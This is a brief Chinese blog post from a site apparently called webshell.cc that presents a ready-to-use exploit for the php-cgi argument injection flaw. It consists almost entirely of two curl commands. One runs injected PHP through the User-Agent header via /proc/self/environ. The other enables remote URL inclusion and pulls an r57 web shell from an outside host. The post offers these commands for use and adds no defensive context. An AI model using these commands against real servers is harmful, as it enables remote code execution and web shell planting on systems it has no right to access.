php-cgi漏洞利用EXP

分类:安全 | 2012-05-15 | 撸过 203 次
0人扯谈

 

1、本地包含直接执行代码:

curl -H "USER-AGENT: <?system('id');die();?>" https://www.webshell.cc/test.php?-dauto_prepend_file%3d/proc/self/environ+-n

2、远程包含执行代码:

curl https://www.webshell.cc/test.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttps://www.webshell.cc/r57.txt


本站内容均为原创,转载请务必保留署名与链接!
php-cgi漏洞利用EXP:https://www.webshell.cc/3599.html

随机日志